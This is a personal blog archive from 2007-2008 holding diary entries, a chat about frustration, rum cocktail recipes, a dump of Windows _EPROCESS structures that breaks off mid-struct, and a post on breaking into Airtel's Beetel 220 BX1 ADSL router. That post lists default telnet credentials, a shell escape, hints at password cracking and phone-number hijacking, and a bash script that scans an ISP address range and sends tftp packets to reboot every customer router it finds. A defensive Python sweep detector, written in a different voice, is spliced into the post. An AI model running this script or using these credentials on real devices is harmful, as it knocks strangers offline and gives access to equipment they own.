Tuesday, July 22, 2008

Well I am back to scribble something onto this blog sheet of mine. It's been almost 5 months since the last time I was here on March 3, 2008.

So first of all let me give u the updates of last 4-5 months.

1. Have got a job for the time being. Almost completed the probation period. Hopefully will be signed in for the job.
2. Did some Rock climbing & trekking a month back in June. Went to the Sino-Indian border. Went up to heights of 18,700 ft above sea level and yet did not faint unlike some of my fellow trekkers. Well that might be attributed to the Vodka and Brandy mix which I bought. I saw some spectacular places and some wonders of nature. Even saw a Match Stick burn like an Incense Stick, because of low Oxygen at those places. Have seen shelling at the border and a few casualties too.
3. Have recently developed a skill of procrastination.
4. Have recently developed a liking of Death Metal Rock genre.
5. Have made some Socially KOOL so called **friends**.
6. Have turned 26 last June, yet no Gf. So according to the promise I am not even trying for one. Drinking and enjoying life will be my goal from now on.

Lessons learnt from last 4-5 months
1. God gave us brains to see and think, yet we illogically create nations and boundaries just for our greed. We differentiate among ourselves and in the end, end up losing the most important virtue - humanity. Simply being indifferent to situations makes us, even me, a part of that clan which one day will be buried with no traces left for aeons in future. What disgusts me more is that even dinosaurs were a lot better.
2. I like it in adverse climate and those adventures where we get tested way more than those boring beach-type adventure crap holidays people dig for.
3. Those COOL, FUNKY and the HAPPENING DUDEs and Dudettes are those persons who are sissy old losers, who are lame and the most idiotic people to be found roaming this planet. Their most important feature is to "GET NOTICED" and their craving for "Public Attention". As cynical as I may sound, these people put on a sort of impregnable mask to hide their innermost idiotic instincts, which has been misinterpreted by the society we live in as the FUNK-Factor of that person.

Well it seems like I have been bitching a lot. But it's the sheer frustration when you get to discover the inner thought process of these kind of people. In my opinion plain, simple and down-to-earth people are the strongest ones, who dare to admit their flaws and weakness.

On a concluding note I will try to improve and will try to do some new things which I have not done before.

Monday, March 3, 2008

Wednesday, February 20, 2008

FRUST-ness

The Term Frust was 1st coined in IIT (Institute of Infinite Tensions), from the English word Frustrated. Since early days, when a guy used to get frustrated becoz of Profs. making them study (mug up) or becoz of a Bandi (girl) or any other Issues, the term "FRUST" started getting used.

Synonyms Being:
pHroooosT ,
Paak Jana,
Fraastu ,
Frusted ,
Jhaand Hona ,
Dimag ka Dahi/Lassi ho Jaana.


Question: So today, after so many decades of ppl getting frust, Why The Hell in this World am I writing about IT ???

Answer: In the term "FRUST" lies greatness beyond all knowledge. In fact, saying it the other way around, it's the means to get ENLIGHTENED, to achieve Moksha.

Question: How, Why, When, Where ?

Answer: Since we are talking about this glorious term FRUST, it can't be explained just by a few answers (how-tos). It's a path of self-realization to the TRUTH of this WORLD. So I am going to talk about a discussion with one of my very very close friends, "Niggu Vimal".

I have been suffering from this Frust-ness for the last couple of months. So yesterday I started talking to Niggu.

==== Chat ====
Me: man, I don't feel like doing anything
earlier it was all compu compu (computer, computer) .. these days not even that ..
Niggu: what happened >:D<
yeah
Me: all I ever felt like doing was compu compu .. now I don't even feel like doing that
Niggu: niggu >:D<
Me: in fact I don't feel like TV, movies or anything else either
>:D<
in fact now I don't even feel like sleeping .. I keep lying down but sleep only comes once in a while
Niggu: what happened
Me: tell me, what should I do ..
Niggu: tell me this
Me: don't know what happened
everything seems just fine
my mind has just gone stale
Niggu: nah
tell me straight
what has happened
Me: don't know, buddy
I don't know myself
what is there to hide from you now :P
Niggu: :D
I know what the trouble in your life is
Me: tell me
Niggu: shall I tell you the honest truth
Me: damn it, I just can't figure it out
yeah, absolutely ..
plzz debug it
Niggu: you won't take it badly, right
Me: no, no
not at all ..
Niggu: niggu, you don't know this
but since college days, of the people who seemed like good guys to me in life
you were one
not good in *that* sense :P
Me: :P
Niggu: good as in a good human being
Me: hehehe
Niggu: and you all had one thing in common
that you guys were far too modest
to the point that even having talent you wouldn't accept it
Me: hmmm ..
brother .. I'm not getting any of this
Niggu: let me speak
Me: ok
Niggu: and you all thought that only by becoming part of the crowd could you get recognition
i mean that people would accept you
brother, sometimes I won't manage to use the right word, so forgive the slips
Me: :P
sure
Niggu: so u guys all tried to be like them
and this very thing holds you guys back everywhere
and makes you frust everywhere
Goplu is in the same state
you are in the same state
there are one or two others, they are in the same state
that's why all are frust with life
that's why you guys always acted in whatever way was acceptable to the crowd
but u guys are best in the way u r
not the way others expect u to be
that's why you guys never say what's on your mind, and never act on it either
and this is one of the main reasons why people take advantage of you guys
and you guys always stay frust
sorry, man
Me: hmmm
Niggu: I thought many times of telling you and Goplu this
but couldn't say it
Me: why sorry
Niggu: i like u guys the way u r
Me: oh come on
hey, you know .. if you talk like this I'll damn well quit my job and set off to roam the world

Niggu: there are a lot of things in u guys which are rare to find in average human beings
and to top it up u guys are modest to the extent that it hampers ur progress
Me: brother, tell me the solution na ...
Niggu: brother, the solution has to come from within
Me: the theory is really awesome ..
Niggu: stay the way you are
don't live for anyone else
live for yourself
okay, if I say one thing, will you take it
?
Me: say it, say it
Niggu: no, first tell me this
are you selfish
Me: I always take your word
Niggu: don't say it just to run yourself down
think and then answer
answer by your own definition of selfish
Me: yes I am, I'm very selfish
Niggu: and what do you think
is the world selfish
?
i mean other people
the ones you like
Me: no, man
I don't think anything at all
Niggu: everyone in the world is selfish
yes
tell me
Me: I don't even think of myself as selfish
Niggu: and the truth is that everyone is selfish
Me: actually I've gotten frust
don't know why
Niggu: nah
you're not frust
you're a very happy person
you've damn well done what you wanted to do
and u r one of the best in ur field
and yes
everyone is a bit frust
the day you become content
that day progress will stop
Me: :O
Niggu: will stop*
==== End of Chat ====

I asked him when this path of pain is going to END. What he told me came as a BIG SHOCK!

Frust-ness, an essential element for Progress??? Without it our progress stops. These questions set my logic spinning...
Was it true??? Then I suddenly remembered that even the Goplu who was mentioned here told me the same.
I guess two people can't be wrong at the same time. The probability now is very low for all three of us or more to be wrong.


So this is when I realized that only when we WALK THROUGH THIS PATH OF FRUST-ness ONLY THEN CAN WE REALIZE WHAT WE REALLY WANT.

So the thing is, when we walk through this path we tend to lose interest in everything and often get desperate. This desperateness is the key. We either do something with that desperateness and go ahead, or we tend to be passive and do nothing. The Key can Unlock the Lock, but it's You who have to use the KEY and open it.

BUT please note There is this PATH of FRUST-ness which leads to your GOALS, but whether You decide to walk through it till the End or Stop In Between and be there for ever IS UP TO YOU..

So Let Me Walk Hand in Hand Through this Path with You.

Monday, February 18, 2008

I'm crazy ..I know it ..

haah ... what a topic to start with ...

new to blogging .. so don't know what to write ...
last time i tried it became a recipe book for 13 different cocktails ..
so now after revelation why i had written that .. i think i am on the verge of becoming a wino .. a drunkard ..
But the question is why do i drink ???

It's not that I am sad or heart broken or anything .. It's like I don't have anything else to do and feel good about .. Life as it is has become monotonous and filled up with boredom.
Am I the one to be blamed ???
Or is it my job ???
or is it something else ..
Its not that I am an introvert or anything ..
I do talk to ppl a lot .. and can make friends very easily .. (putting that aside)
The thing is I really don't connect with ppl or may be can't anymore ..
Its like even talking to ppl over something totally new topic doesn't excite me any more ..
At one point of my life technology seemed interesting .. had to find out how things work ..etc etc .. i did that .. learned a lot but now don't feel like it anymore ..
That facet of me has died i guess .. don't feel like doing anything ..
feel like sleeping but can't sleep anymore ..
I loiter around in the nights ... don't know what i am missing .. what I should do to make this "boring" life a bit more exciting ..
going this way .. in a year or two .. i'll be like a walking zombie or something ..
zombie since neither it has any goal nor any destination ..

Can someone help me in this regard by giving me some idea...?????????????

Tuesday, February 5, 2008

Bacardi Cocktails for Dummies :)

****DISCLAIMER****
=====================================================================
=I am not responsible for whatever u do after u prepare my recipes. =
=U r solely responsible for ur own set of Actions after Intoxication=
=I am not responsible if u dont like this recipes/shit/crap/bullshit=
=These Cocktails are mostly not available in India so dont try alone=
=I aint responsible if U get Caught by Cops while being intoxicated =
= And the Last and the Main Point =
= This is just for EDUCATIONAL PURPOSES ONLY =
=====================================================================

Recipes:

A.
===

Go-Go Girl
===========
1. 60 ml of Bacardi® White Rum
2. 10 ml of mango Juice
3. 10 ml of pineapple juice
+ ICE as it suits u.

B.
===

Tsunami
========
1. 30 ml Blue Curacao liqueur
2. 30 ml Bacardi® white rum
3. Mountain Dew® citrus soda
+ Lehar Slice [to taste] + ICE

C.
===

Jamaican Kick
==============
30 ml of Bacardi® white rum
20 ml of Malibu® coconut rum
10 ml of banana liqueur
1 cranberry juice [can find it in some super mart]
1 pineapple juice

D.
===

Hurricane .1
=============
10 of Myer's® dark rum
50 of Bacardi® light rum
2 of orange juice
2 of pineapple juice
1 1/2 tsp grenadine syrup
2 cherries
1 pineapple chunk
1 tsp sugar [brown sugar preferable [jaggery sugar]]

E.
===

Godzilla/KingKong Smile [Dont remember the Name exactly.. spl for fruit lovers]
================================================================================
1/2 banana
3 strawberries
10 ML of fruit punch
20 of Bacardi® light rum
20 of banana rum
10 of peach squash [ + few slices of peach will do fine ]

F.
===

Lip Stick cocktail
==================
30 ml Bacardi® white rum
20 ml banana rum
10 ml fruit cream
5 ml grenadine syrup

G.
===

Dominican Recipe:
==================
50 ml Bacardi® white rum
10 ml grapefruit juice
+ lemon-lime soda [to taste]

H.
===

Bacardi Hurricane
====================
30 ml Bacardi® white rum
30 ml Bacardi® black rum [available in Mumbai/Bangy Bars]
30 ml Fruit syrup
+ Sugar Syrup to taste [or one can remove fruit syrup and add Rooh Afza [the red one]]


I.
===

Bali Dream [2 pegs]
========================
20 ml Bacardi® white rum
20 ml Bacardi® black rum
20 ml banana juice
20 ml Passoa brandy/rum
10 ml coconut rum
10 ml grenadine/sugar syrup
20 ml orange juice

J.
===

Mai Tai [Chinese or Japanese or Taiwan's drink donno ..n dinn understand ]
===========================================================================
30 ml Bacardi® dark rum
10 ml Bacardi® light rum
10 ml triple sec
10 ml Tropicana® orange juice
10 ml canned pineapple juice
10 ml grenadine/sugar syrup, or Rooh Afza will also do.
+ ice cubes

K.
===

Flying Hawaii
==============
10 ml Melon rum
50 ml Bacardi® white rum
10 ml Sprite® soda
10 ml pineapple juice
+ ice

L.
===

Black Rose.
============
50 ml Bacardi® white rum
10 ml Coca-Cola®
10 ml lime juice
+ ice

M.
===

Blond BombShell
================
2 cups crushed ice
50 ml Bacardi® light rum
1 can frozen lemonade concentrate [thicken lemon juice with sugar]


Well 13 recipes so far .. Some of my favs among a lot.
Even u can go crazy with some mixes .. let me know if u make some crazy shit ..
gauravsaha [**AT**] gmail [**DOT**] com

Monday, September 24, 2007

Airtel BroadBand Vulnerable to wide range of Attacks.

Airtel BroadBand provides its users with the "Beetel 220 BX1" ADSL2+ CPE.
This Beetel product runs embedded Linux (probably some RTOS-style Linux).
There are a number of services running on the system. I am going to explain how to HACK (!crack) into the box for FUN & Profit.

The box comes with default IP Gateway = 192.168.1.1
and ur machine takes up 192.168.1.2 IP address.

what you have to do is :-
telnet 192.168.1.1

now there are 3 usernames by default.
"admin"
"support"
"user"

and their default passwords are :-
USERNAME-------->PASSWORD
"admin" -------->password
"support"------->supportuser
"user"---------->normaluser

now You can log into the Machine.
There will be some changes wrt a normal linux box. But it's ok. It's nice.
there might be a menu like :

Note: If you have problem with Backspace key, please make sure you configure your terminal emulator settings. For instance, from HyperTerminal you would need to use File->Properties->Setting->Back Space key sends.

Main Menu

1. ADSL Link State
2. LAN
3. WAN
4. DNS Server
5. Route Setup
6. NAT
7. Firewall
8. Quality Of Service
9. Management
10. Passwords
11. Reset to Default
12. Save and Reboot
13. Exit
->

now this is one lame script ...U can exit (bypass) this script by typing "sh" command.
now u have an ~somewhat~ workable shell(konsole)

now type "help" u will get :-
Built-in commands:
-------------------
. : break cd continue eval exec exit export help login newgrp
read readonly set shift times trap umask wait [ busybox cat df
dmesg echo expr false ifconfig init insmod kill klogd linuxrc
logger logread mkdir mount msh ping ps pwd reboot rm rmmod route
sendarp sh sysinfo syslogd test tftp tftpd true tty vconfig

now u do ls /ls -a/ls -al ...mmmmmm it does not work ..shit ...what to do now ?

ls <--- does not work ...
so we will use an alternative "echo *" like in very old digital unix boxes which we had in college(kgp).

now on doing "echo *":-
# echo *
bin dev etc lib linuxrc mnt proc sbin usr var webs
#

ok now this seems a bit OK!! thank G0d(if exist any)...

next step ...do a ps -xa :))
# ps -xa
PID Uid VmSize Stat Command
1 admin 248 S init
2 admin SWN [ksoftirqd/0]
3 admin SW< [events/0]
4 admin SW< [khelper]
5 admin SW< [kblockd/0]
6 admin SW [pdflush]
7 admin SW [pdflush]
8 admin SW [kswapd0]
9 admin SW< [aio/0]
10 admin SW [mtdblockd]
17 admin 292 S -sh
35 admin 532 S cfm
121 admin 176 S pvc2684d
205 admin 212 S dhcpd
211 admin 280 S syslogd -C -l 7
212 admin 540 S telnetd
216 admin 148 S bftpd
219 admin 180 S tftpd
220 admin 648 S httpd
222 admin 216 S klogd
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040xxxxxxxxxxxx
274 admin 196 S /bin/dnsprobe
278 admin 268 S upnp -L br0 -W ppp_1_32_1 -D
339 admin 600 S telnetd
340 admin 264 S sh -c sh
341 admin 304 S sh
345 admin 248 R ps -xa
#
HOLY SHIT .... SO MANY process running in this small b0x :-P
now what processor does it have :-O
lets check ....
# cd /proc
# echo *
1 10 121 17 2 205 211 212 216 219 220 222 226 274 278 286 3 339 340 341 35 4 5 6 7 8 9 buddyinfo bus cmdline cpuinfo devices diskstats driver execdomains filesystems fs interrupts iomem ioports irq kcore kmsg loadavg locks meminfo misc modules mounts mtd net partitions self slabinfo stat sys sysvipc tty uptime var version vmstat

# cat cpuinfo
system type : 96338L-2M-8M
processor : 0
cpu model : BCM6338 V1.0
BogoMIPS : 235.52
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : no
VCED exceptions : not available
VCEI exceptions : not available
#

hmmmmmmm ........
# cat meminfo
MemTotal: 6164 kB
MemFree: 520 kB
Buffers: 80 kB
Cached: 1144 kB
SwapCached: 0 kB
Active: 2172 kB
Inactive: 112 kB
HighTotal: 0 kB
HighFree: 0 kB
LowTotal: 6164 kB
LowFree: 520 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 0 kB
Writeback: 0 kB
Mapped: 2036 kB
Slab: 2104 kB
Committed_AS: 2916 kB
PageTables: 304 kB
VmallocTotal: 1048560 kB
VmallocUsed: 688 kB
VmallocChunk: 1047836 kB
#


man this box is such a bottleneck ... :(( [may be this is why my net is always so slow :p]

# cat /etc/issue
cat: /etc/issue: No such file or directory
#
hmmmmmm.... it doesn't ...what to do ....
# cat /proc/version
Linux version 2.6.8.1 (root@localhost.localdomain) (gcc version 3.4.2) #1 Fri Dec 23 09:56:55 CST 2005
#
hmmm .............
gcc :)) well i think i can have phun ..... :)) =)) >:) \:D/ <:-p
# gcc
gcc: not found
# cc
cc: not found
#

:(( guess not .... :(( shit ..f*** a$$h**** ... now what fun is linux without gcc ...
may be that's the reason they had ...2 make us not have phun :P ...well fu** them ... we will still have phun .... :D


121 admin 176 S pvc2684d
205 admin 212 S dhcpd
211 admin 280 S syslogd -C -l 7
212 admin 540 S telnetd
216 admin 148 S bftpd
219 admin 180 S tftpd
220 admin 648 S httpd
222 admin 216 S klogd
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040XXXXXX <--- (X)
274 admin 196 S /bin/dnsprobe
278 admin 268 S upnp -L br0 -W ppp_1_32_1 -D
339 admin 600 S telnetd
340 admin 264 S sh -c sh
341 admin 308 S sh
355 admin 248 R ps -xa


(X) == UR PHONE NUMBER (040400XXXXX)
NOW ...
the servers running on the box are of interest .........
httpd, tftpd, bftpd, telnetd.....

now what ....
well we will start fuzzing .....these daemons.... lets see what's the output ...
[I will just give an example with tftpd... the source of a client is attached with it + a simple tiny script which scans the Class B network and reboots the boxes :-P ]
........ [this is how u can have fun ...ppl who know the VA process know what to do next ]


Hey check out /etc directory .....
few cool files there ... like passwd, default.cfg ....etc etc ...
default.cfg has base64 encoded password which is used when the box is RSTed....
and passwd file can be cracked open by john in 1 min ...
try those ....
check out all those files which might give some info about the box ... now that's Hacking :)
ok ... now something NICE ... ok naa ????


now what is this ...
226 admin 332 S pppd -c 1.32.1 -r airtel -i nas_1_32 -u 040XXXXXX
well u tell me :)
now its a daemon which is using ur phone number ... [:o why so ]
WHO Knows ... I am not going to give u any more answers... OTHERWISE I will be JAILED [:o hooooaaa ...wtf ...yes ...Since there are LAWs In INDIA now ... ;)]
but what if ...i change the phone number .... what can i get :-P
who knows ... may be u can hijack phones or may be u can get the same speed of that user to whom the phone belongs .... who knows ...
if u want to find out ..please go ahead .... do it on ur own ...
I wish u best of luck ....and happy hacking :D


===== CODE =====
#!/bin/bash

var0=1
LIMIT=255
var1=1


while [ "$var1" -lt "$LIMIT" ]
do
var1=`expr $var1 + 1`
state=`nmap -sP -T Insane 122.169.$var1.1 | grep up | cut -d '(' -f2 | cut -d '.' -f1-3 | grep hosts | cut -d ' ' -f1 | wc -l`

if [ $state -eq 0 ]
then
echo -ne "Sending Packet to $1.$var1 Network Segment\n"
while [ "$var0" -lt "$LIMIT" ]
do
var0=`expr $var0 + 1` # var0=$(($var0+1)) also works.
# var0=$((var0 + 1)) also works.
# let "var0 += 1" also works.
if [ $var0 -ne 159 ] #159 is my ipaddr so to not boot mine
then
./tftp $1.$var1.$var0 69 S a > /dev/null 2>&1 &
fi
done # Various other methods also work.
sleep 5s
fi
done

echo
exit 0

===== END of CODE ======
./tftp == STANDARD TFTP CLIENT
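From the defender's side, the sweep script above leaves a very recognisable trace: one source address hitting UDP/69 (and, for the telnet login, TCP/23) on many different hosts within a few seconds. The Python below is an added example, not code from the original post. It parses netfilter LOG lines as a Linux gateway's syslog writes them (a constructed sample, with RFC 5737 documentation addresses), and raises one alert per source that reaches a threshold of distinct destinations on a watched port inside a sliding time window. The year 2008, the window, the threshold and the log format are assumptions of the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: netfilter LOG lines as a Linux gateway's syslog would record
# them, in time order. Addresses come from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
Sep 24 21:03:10 gw kernel: IN=ppp0 OUT= SRC=198.51.100.4 DST=192.0.2.15 PROTO=TCP SPT=51022 DPT=80 LEN=60
Sep 24 21:03:11 gw kernel: IN=ppp0 OUT= SRC=203.0.113.7 DST=192.0.2.2 PROTO=UDP SPT=43012 DPT=69 LEN=32
Sep 24 21:03:11 gw kernel: IN=ppp0 OUT= SRC=203.0.113.7 DST=192.0.2.3 PROTO=UDP SPT=43012 DPT=69 LEN=32
Sep 24 21:03:12 gw kernel: IN=ppp0 OUT= SRC=203.0.113.7 DST=192.0.2.4 PROTO=UDP SPT=43012 DPT=69 LEN=32
Sep 24 21:03:12 gw kernel: IN=ppp0 OUT= SRC=203.0.113.7 DST=192.0.2.4 PROTO=UDP SPT=43013 DPT=69 LEN=32
Sep 24 21:03:13 gw kernel: IN=ppp0 OUT= SRC=203.0.113.7 DST=192.0.2.5 PROTO=UDP SPT=43012 DPT=69 LEN=32
Sep 24 21:03:14 gw kernel: IN=ppp0 OUT= SRC=203.0.113.7 DST=192.0.2.6 PROTO=UDP SPT=43012 DPT=69 LEN=32
Sep 24 21:05:40 gw kernel: IN=ppp0 OUT= SRC=198.51.100.4 DST=192.0.2.15 PROTO=UDP SPT=40001 DPT=69 LEN=32
Sep 24 21:09:55 gw kernel: IN=ppp0 OUT= SRC=198.51.100.4 DST=192.0.2.16 PROTO=UDP SPT=40002 DPT=69 LEN=32
"""

LOG_RE = re.compile(
    r"^(\w{3}) +(\d+) (\d\d:\d\d:\d\d) \S+ kernel: .*?SRC=(\S+) DST=(\S+) "
    r"PROTO=(\S+) .*?DPT=(\d+)"
)
EPOCH = datetime(2008, 1, 1)                 # syslog omits the year; 2008 is assumed
WATCHED_PORTS = {23: "telnet", 69: "tftp"}   # services the post found listening on the CPE


def parse_line(line):
    """Return {ts, src, dst, proto, dpt} for a netfilter LOG line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    mon, day, hms, src, dst, proto, dpt = m.groups()
    when = datetime.strptime(f"{EPOCH.year} {mon} {day} {hms}", "%Y %b %d %H:%M:%S")
    return {"ts": (when - EPOCH).total_seconds(), "src": src, "dst": dst,
            "proto": proto, "dpt": int(dpt)}


def detect_sweeps(lines, window=10.0, threshold=5):
    """Flag any source that reaches >= threshold distinct destinations on one
    watched port within `window` seconds. One alert per (source, port)."""
    recent = defaultdict(deque)   # (src, dpt) -> deque of (ts, dst), oldest first
    alerted = set()
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["dpt"] not in WATCHED_PORTS:
            continue
        key = (ev["src"], ev["dpt"])
        q = recent[key]
        q.append((ev["ts"], ev["dst"]))
        while q and ev["ts"] - q[0][0] > window:   # drop events outside the window
            q.popleft()
        targets = {dst for _, dst in q}
        if len(targets) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"src": ev["src"], "service": WATCHED_PORTS[ev["dpt"]],
                           "targets": len(targets), "span_s": ev["ts"] - q[0][0]})
    return alerts


if __name__ == "__main__":
    for a in detect_sweeps(SAMPLE_LOG.splitlines()):
        print(f"{a['src']} swept {a['targets']} hosts on {a['service']} "
              f"within {a['span_s']:.0f}s")
```

On the sample, 203.0.113.7 touches five distinct hosts on UDP/69 in three seconds and is reported once; 198.51.100.4 only reaches two hosts on that port several minutes apart and stays below the threshold. Note that a CPE whose own telnetd and tftpd are reachable from the WAN side is the real exposure here: the matching fix on the box is to change the three default passwords and keep those daemons bound to the LAN.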

Saturday, April 7, 2007

_EPROCESS structure for XP, 2003, 2000 and NT

typedef struct _EPROCESS_NT4
{
KPROCESS_NT4 Pcb;
NTSTATUS ExitStatus;
KEVENT LockEvent;
ULONG LockCount;
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
PKTHREAD_NT4 LockOwner;
ULONG UniqueProcessId;
LIST_ENTRY ActiveProcessLinks;
ULONGLONG QuotaPeakPoolUsage;
ULONGLONG QuotaPoolUsage;
ULONG PagefileUsage;
ULONG CommitCharge;
ULONG PeakPagefileUsage;
ULONG PeakVirtualSize;
ULONGLONG VirtualSize;
MMSUPPORT_NT4 Vm;
ULONG LastProtoPteFault;
ULONG DebugPort;
ULONG ExceptionPort;
PHANDLE_TABLE ObjectTable;
PACCESS_TOKEN Token;
FAST_MUTEX WorkingSetLock;
ULONG WorkingSetPage;
BOOLEAN ProcessOutswapEnabled;
BOOLEAN ProcessOutswapped;
BOOLEAN AddressSpaceInitialized;
BOOLEAN AddressSpaceDeleted;
FAST_MUTEX AddressCreationLock;
KSPIN_LOCK HyperSpaceLock;
PETHREAD_NT4 ForkInProgress;
USHORT VmOperation;
BOOLEAN ForkWasSuccessful;
UCHAR MmAgressiveWsTrimMask;
PKEVENT VmOperationEvent;
HARDWARE_PTE PageDirectoryPte;
ULONG LastFaultCount;
ULONG ModifiedPageCount;
PVOID VadRoot;
PVOID VadHint;
ULONG CloneRoot;
ULONG NumberOfPrivatePages;
ULONG NumberOfLockedPages;
USHORT NextPageColor;
BOOLEAN ExitProcessCalled;
BOOLEAN CreateProcessReported;
HANDLE SectionHandle;
PPEB Peb;
PVOID SectionBaseAddress;
PEPROCESS_QUOTA_BLOCK QuotaBlock;
NTSTATUS LastThreadExitStatus;
PPROCESS_WS_WATCH_INFORMATION WorkingSetWatch;
HANDLE Win32WindowStation;
HANDLE InheritedFromUniqueProcessId;
ACCESS_MASK GrantedAccess;
ULONG DefaultHardErrorProcessing;
PVOID LdtInformation;
PVOID VadFreeHint;
PVOID VdmObjects;
KMUTANT ProcessMutant;
UCHAR ImageFileName[16];
ULONG VmTrimFaultValue;
UCHAR SetTimerResolution;
UCHAR PriorityClass;
union
{
struct
{
UCHAR SubSystemMinorVersion;
UCHAR SubSystemMajorVersion;
};
USHORT SubSystemVersion;
};
PVOID Win32Process;
} EPROCESS_NT4, *PEPROCESS_NT4;



typedef struct _EPROCESS_W2K
{
KPROCESS_W2K Pcb;
NTSTATUS ExitStatus;
KEVENT LockEvent;
ULONG LockCount;
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
PKTHREAD_W2K LockOwner;
ULONG UniqueProcessId;
LIST_ENTRY ActiveProcessLinks;
ULONGLONG QuotaPeakPoolUsage;
ULONGLONG QuotaPoolUsage;
ULONG PagefileUsage;
ULONG CommitCharge;
ULONG PeakPagefileUsage;
ULONG PeakVirtualSize;
ULONGLONG VirtualSize;
MMSUPPORT_W2K Vm;
LIST_ENTRY SessionProcessLinks;
ULONG DebugPort;
ULONG ExceptionPort;
PHANDLE_TABLE ObjectTable;
PACCESS_TOKEN Token;
FAST_MUTEX WorkingSetLock;
ULONG WorkingSetPage;
BOOLEAN ProcessOutswapEnabled;
BOOLEAN ProcessOutswapped;
BOOLEAN AddressSpaceInitialized;
BOOLEAN AddressSpaceDeleted;
FAST_MUTEX AddressCreationLock;
KSPIN_LOCK HyperSpaceLock;
PETHREAD_W2K ForkInProgress;
USHORT VmOperation;
BOOLEAN ForkWasSuccessful;
UCHAR MmAgressiveWsTrimMask;
PKEVENT VmOperationEvent;
PVOID PaeTop;
ULONG LastFaultCount;
ULONG ModifiedPageCount;
PVOID VadRoot;
PVOID VadHint;
ULONG CloneRoot;
ULONG NumberOfPrivatePages;
ULONG NumberOfLockedPages;
USHORT NextPageColor;
BOOLEAN ExitProcessCalled;
BOOLEAN CreateProcessReported;
HANDLE SectionHandle;
PPEB Peb;
PVOID SectionBaseAddress;
PEPROCESS_QUOTA_BLOCK QuotaBlock;
NTSTATUS LastThreadExitStatus;
PPROCESS_WS_WATCH_INFORMATION WorkingSetWatch;
HANDLE Win32WindowStation;
HANDLE InheritedFromUniqueProcessId;
ACCESS_MASK GrantedAccess;
ULONG DefaultHardErrorProcessing;
PVOID LdtInformation;
PVOID VadFreeHint;
PVOID VdmObjects;
PDEVICE_MAP DeviceMap;
ULONG SessionId;
LIST_ENTRY PhysicalVadList;
HARDWARE_PTE PageDirectoryPte;
ULONG Filler;
ULONG PaePageDirectoryPage;
UCHAR ImageFileName[16];
ULONG VmTrimFaultValue;
UCHAR SetTimerResolution;
UCHAR PriorityClass;
union
{
struct
{
UCHAR SubSystemMinorVersion;
UCHAR SubSystemMajorVersion;
};
USHORT SubSystemVersion;
};
PVOID Win32Process;
PEJOB Job;
ULONG JobStatus;
LIST_ENTRY JobLinks;
PVOID LockedPageList;
PVOID SecurityPort;
PWOW64_PROCESS Wow64Process;
LARGE_INTEGER ReadOperationCount;
LARGE_INTEGER WriteOperationCount;
LARGE_INTEGER OtherOperationCount;
LARGE_INTEGER ReadTransferCount;
LARGE_INTEGER WriteTransferCount;
LARGE_INTEGER OtherTransferCount;
ULONG CommitChargeLimit;
ULONG CommitChargePeek;
LIST_ENTRY ThreadListHead;
PRTL_BITMAP VadPhysicalPagesBitMap;
ULONG VadPhysicalPages;
ULONG AweLock;
} EPROCESS_W2K, *PEPROCESS_W2K;



typedef struct _EPROCESS_XP
{
KPROCESS_XP Pcb;
EX_PUSH_LOCK ProcessLock;
LARGE_INTEGER CreateTime;
LARGE_INTEGER ExitTime;
EX_RUNDOWN_REF RundownProtect;
PVOID UniqueProcessId;
LIST_ENTRY ActiveProcessLinks;
ULONG QuotaUsage[3];
ULONG QuotaPeak[3];
ULONG CommitCharge;
ULONG PeakVirtualSize;
ULONG VirtualSize;
LIST_ENTRY SessionProcessLinks;
PVOID DebugPort;
PVOID ExceptionPort;
PHANDLE_TABLE ObjectTable;
EX_FAST_REF Token;
FAST_MUTEX WorkingSetLock;
ULONG WorkingSetPage;
FAST_MUTEX AddressCreationLock;
KSPIN_LOCK HyperSpaceLock;
PETHREAD_XP ForkInProgress;
ULONG HardwareTrigger;
PVOID VadRoot;
PVOID VadHint;
PVOID CloneRoot;
ULONG NumberOfPrivatePages;
ULONG NumberOfLockedPages;
PVOID Win32Process;
PEJOB Job;
PSECTION_OBJECT SectionObject;
PVOID SectionBaseAddress;
PEPROCESS_QUOTA_BLOCK QuotaBlock;
PPAGEFAULT_HISTORY WorkingSetWatch;
PVOID Win32WindowStation;
PVOID InheritedFromUniqueProcessId;
PVOID LdtInformation;
PVOID VadFreeHint;
PVOID VdmObjects;
PDEVICE_MAP DeviceMap;
LIST_ENTRY PhysicalVadList;
union
{
HARDWARE_PTE PageDirectoryPte;
ULONGLONG Filler;
};
PVOID Session;
UCHAR ImageFileName[16];
LIST_ENTRY JobLinks;
PVOID LockedPageList;
LIST_ENTRY ThreadListHead;
PVOID SecurityPort;
PVOID PaeTop;
ULONG ActiveThreads;
ULONG GrantedAccess;
ULONG DefaultHardErrorProcessing;
NTSTATUS LastThreadExitStatus;
PPEB Peb;
EX_FAST_REF PrefetchTrace;
LARGE_INTEGER ReadOperationCount;
LARGE_INTEGER WriteOperationCount;
LARGE_INTEGER OtherOperationCount;
LARGE_INTEGER ReadTransferCount;
LARGE_INTEGER WriteTransferCount;
LARGE_INTEGER OtherTransferCount;
ULONG CommitChargeLimit;
ULONG CommitChargePeek;
PVOID AweInfo;
SE_AUDIT_PROCESS_CREATION_INFO SeAuditProcessCreationInfo;
MMSUPPORT_XP Vm;
ULONG LastFaultCount;
ULONG ModifiedPageCount;
ULONG NumberOfVads;
ULONG JobStatus;
union
{
ULONG Flags;
struct
{
ULONG CreateReported : 1;
ULONG NoDebugInherit : 1;
ULONG ProcessExiting : 1;
ULONG ProcessDelete : 1;
ULONG Wow64SplitPages : 1;
ULONG VmDeleted : 1;
ULONG OutswapEnabled : 1;
ULONG Outswapped : 1;
ULONG ForkFailed : 1;
ULONG HasPhysicalVad : 1;
ULONG AddressSpaceInitialized : 2;
ULONG SetTimerResolution : 1;
ULONG BreakOnTermination : 1;
ULONG SessionCreationUnderway : 1;
ULONG WriteWatch : 1;
ULONG ProcessInSession : 1;
ULONG OverrideAddressSpace : 1;
ULONG HasAddressSpace : 1;
ULONG LaunchPrefetched : 1;
ULONG InjectInpageErrors : 1;
